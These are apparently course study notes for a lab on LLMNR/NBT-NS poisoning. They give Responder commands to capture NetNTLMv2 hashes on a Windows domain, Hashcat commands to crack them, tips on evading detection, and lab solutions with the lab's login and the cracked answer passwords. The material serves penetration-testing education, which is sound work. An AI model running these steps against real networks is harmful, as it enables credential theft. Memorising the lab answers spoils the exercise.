☣️LLMNR/NBT-NS Poisoning from Linux

Page 6 - LLMNR/NBT-NS Poisoning from Linux

Overview

This section covers Man-in-the-Middle (MITM) attacks on Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) broadcasts to capture domain credentials and establish a foothold.

Attack Goal

• Capture NetNTLMv2 hashes from network traffic

• Crack hashes offline to obtain cleartext passwords

• Gain initial domain foothold with valid credentials

---

LLMNR & NBT-NS Protocol Primer

What are LLMNR & NBT-NS?

Microsoft Windows components that serve as alternate name resolution methods when DNS fails:

LLMNR (Link-Local Multicast Name Resolution)

• Purpose: Host identification when DNS fails

• Port: 5355/UDP

• Behavior: Broadcasts to all hosts on local network

• Based on: DNS format

NBT-NS (NetBIOS Name Service)

• Purpose: System identification by NetBIOS name

• Port: 137/UDP

• Behavior: Used when LLMNR fails

• Function: Local network name resolution

The Vulnerability

ANY host on the network can reply to LLMNR/NBT-NS requests!

---

Attack Methodology

Attack Flow Example

1. User mistypes: \\printer01.inlanefreight.local (instead of \\print01)
   ↓
2. DNS server responds: "Host unknown"
   ↓  
3. Host broadcasts: "Anyone know \\printer01.inlanefreight.local?"
   ↓
4. Attacker responds: "Yes, that's me!" (POISONING)
   ↓
5. Host sends authentication: Username + NTLMv2 hash
   ↓
6. Attacker captures hash for offline cracking

Technical Details

• Spoofing: Pretend to be the requested host

• Capture: NetNTLM authentication attempts

• Result: Username + NTLMv2 password hash

• Follow-up: Offline brute force or SMB relay

---

Tools for LLMNR/NBT-NS Poisoning

Tool	Description	Platform
Responder	Purpose-built LLMNR/NBT-NS poisoning tool	Linux/Windows
Inveigh	Cross-platform MITM platform	PowerShell/C#
Metasploit	Built-in scanners and spoofing modules	Multi-platform

Supported Protocols

All tools can attack:

• LLMNR, DNS, MDNS, NBNS

• DHCP, ICMP, HTTP, HTTPS

• SMB, LDAP, WebDAV, Proxy Auth

Responder additionally supports:

• MSSQL, DCE-RPC

• FTP, POP3, IMAP, SMTP auth

---

Responder Tool Usage

Basic Commands

# View help options
responder -h

# Passive analysis mode (reconnaissance only)
sudo responder -I ens224 -A

# Active poisoning (default mode)
sudo responder -I ens224

# With common flags
sudo responder -I ens224 -wf

Key Responder Flags

Flag	Function	Notes
-I	Network interface	Required (or use IP with -i)
-A	Analyze mode	Passive listening only
-w	WPAD rogue proxy	Captures HTTP requests
-f	Fingerprint	OS version detection
-r	NetBIOS wredir	May break network functionality
-v	Verbose	Increased output
-F	Force WPAD auth	May cause login prompts
-P	Proxy auth	Force NTLM/Basic authentication

Required Network Ports

Responder needs these ports available:

UDP: 137, 138, 53, 389, 1434, 5355, 5353
TCP: 389, 1433, 80, 135, 139, 445, 21, 3141, 25, 110, 587, 3128

---

Capturing Hashes with Responder

Starting a Capture Session

# Basic capture
sudo responder -I ens224

# Recommended flags for maximum effectiveness
sudo responder -I ens224 -wf

# Run in background while doing other enum
sudo responder -I ens224 -wf &
# or use tmux/screen

Hash Storage Locations

Log files stored in: /usr/share/responder/logs/

Naming convention: (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt

Examples:

SMB-NTLMv2-SSP-172.16.5.25.txt
HTTP-NTLMv2-172.16.5.200.txt  
Proxy-Auth-NTLMv2-172.16.5.200.txt

Log File Types

# Example log directory
ls /usr/share/responder/logs/

Analyzer-Session.log                # Analysis mode logs
Responder-Session.log              # Main session log
Config-Responder.log               # Configuration changes
Poisoners-Session.log              # Poisoning attempts
SMB-NTLMv2-SSP-172.16.5.25.txt   # Captured SMB hash
HTTP-NTLMv2-172.16.5.200.txt     # Captured HTTP hash

---

Hash Cracking with Hashcat

Identifying Hash Type

NetNTLMv2 hashes are most common from Responder:

• Hashcat mode: 5600

• Cannot be used for Pass-the-Hash (must crack)

• Format: Long string with multiple colons

Basic Hashcat Cracking

# Crack NetNTLMv2 hash with rockyou
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt

# With optimizations
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt -O

# Show cracked hashes
hashcat -m 5600 captured_hash.txt --show

Example Successful Crack

# Input hash file content
FOREND::INLANEFREIGHT:4af70a79938ddf8a:0f85ad1e80baa52d732719dbf62c34cc:...

# Hashcat output
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: FOREND::INLANEFREIGHT:4af70a79938ddf8a:0f85ad1e80ba...
Time.Started.....: Mon Feb 28 15:20:30 2022 (11 secs)
Speed.#1.........: 1086.9 kH/s
Recovered........: 1/1 (100.00%) Digests
Result...........: Klmcargo2

---

Advanced Techniques

WPAD Poisoning

Web Proxy Auto-Discovery captures HTTP traffic:

# Enable WPAD rogue proxy
sudo responder -I ens224 -w

# Highly effective in large organizations
# Captures Internet Explorer auto-detect traffic

Multi-Protocol Capture

Responder captures multiple authentication types:

• SMB: File share access attempts

• HTTP: Web authentication

• LDAP: Directory service queries

• Proxy: Browser proxy authentication

Operational Considerations

Best practices:

• Run continuously during assessment

• Use tmux/screen for persistent sessions

• Monitor multiple interfaces if available

• Combine with other techniques (password spraying)

---

Lab Exercises & Solutions

Lab Environment

• Target: 10.129.226.51 (ACADEMY-EA-ATTACK01)

• Credentials: htb-student:HTB_@cademy_stdnt!

• Network: Internal AD environment

Question 1: Capture Hash for User Starting with 'b'

Task: Run Responder and obtain hash for user account starting with letter 'b'

Solution:

# SSH to attack host
ssh htb-student@10.129.226.51

# Start Responder
sudo responder -I ens224 -wf

# Wait for traffic (may need to wait or generate activity)
# Check logs for captured hashes
ls /usr/share/responder/logs/

# Look for hashes with usernames starting with 'b'
grep -r "^[bB]" /usr/share/responder/logs/*.txt

Answer: backupagent

Question 2: Crack the Previous Hash

Task: Crack the hash for the backupagent account

Solution:

# Find the hash file for backupagent
ls /usr/share/responder/logs/ | grep -i backup

# Crack with Hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt /usr/share/wordlists/rockyou.txt

# Show cracked result
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt --show

Answer: h1backup55

Question 3: Capture and Crack Hash for User 'wley'

Task: Obtain NTLMv2 hash for user wley and crack it

Solution:

# Continue running Responder (or restart)
sudo responder -I ens224 -wf

# Wait for wley user activity
# Monitor logs for wley hash
tail -f /usr/share/responder/logs/Responder-Session.log

# Once captured, crack the hash
hashcat -m 5600 /usr/share/responder/logs/*wley*.txt /usr/share/wordlists/rockyou.txt

# View result
hashcat -m 5600 /usr/share/responder/logs/*wley*.txt --show

Answer: transporter@4

---

Detection and Evasion

Blue Team Detection Methods

• Network monitoring for unusual multicast traffic

• DNS logging for failed resolution patterns

• Authentication monitoring for rapid hash attempts

• Network segmentation to limit broadcast domains

Red Team Evasion Techniques

• Selective poisoning (target specific hosts)

• Time-based attacks (poison during business hours)

• Protocol selection (focus on less monitored protocols)

• Legitimate-looking responses (match network naming schemes)

---

Common Issues & Troubleshooting

Responder Not Capturing Hashes

Check:

1. Network interface is correct

2. Ports are available (kill conflicting services)

3. Network activity exists (users accessing resources)

4. Permissions (run as root/sudo)

Hashcat Not Cracking

Considerations:

1. Hash format is correct (mode 5600 for NetNTLMv2)

2. Wordlist path is valid

3. Hardware capabilities (GPU vs CPU)

4. Password complexity (may need larger wordlists)

Network Impact

Potential issues:

• Service disruption from poisoned responses

• Network instability if using -r flag

• Alerting security teams to testing activity

---

Key Takeaways

Attack Value

• Low technical barrier to entry

• High success rate in many environments

• Provides domain foothold for further attacks

• Passive collection while performing other tasks

Defensive Recommendations

1. Disable LLMNR/NBT-NS where possible

2. Implement network segmentation

3. Monitor authentication patterns

4. Use strong password policies

5. Deploy SMB signing to prevent relay attacks

Operational Tips

• Start early in assessment (passive collection)

• Run continuously during testing

• Combine with enumeration activities

• Prioritize hash cracking based on enumeration results

---

Command Reference

Responder Operations

# Passive analysis
sudo responder -I ens224 -A

# Active poisoning
sudo responder -I ens224
sudo responder -I ens224 -wf     # With WPAD + fingerprinting

# Check logs
ls /usr/share/responder/logs/
tail -f /usr/share/responder/logs/Responder-Session.log

Hash Processing

# Crack NetNTLMv2 hashes
hashcat -m 5600 hash_file.txt /usr/share/wordlists/rockyou.txt

# Show cracked hashes
hashcat -m 5600 hash_file.txt --show

# Extract just the password
hashcat -m 5600 hash_file.txt --show | cut -d: -f6

Log Analysis

# Find specific usernames
grep -r "USERNAME" /usr/share/responder/logs/

# Count captured hashes
ls /usr/share/responder/logs/*.txt | wc -l

# View hash contents
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt

This poisoning technique provides an excellent foothold for domain penetration testing by exploiting fundamental Windows networking protocols.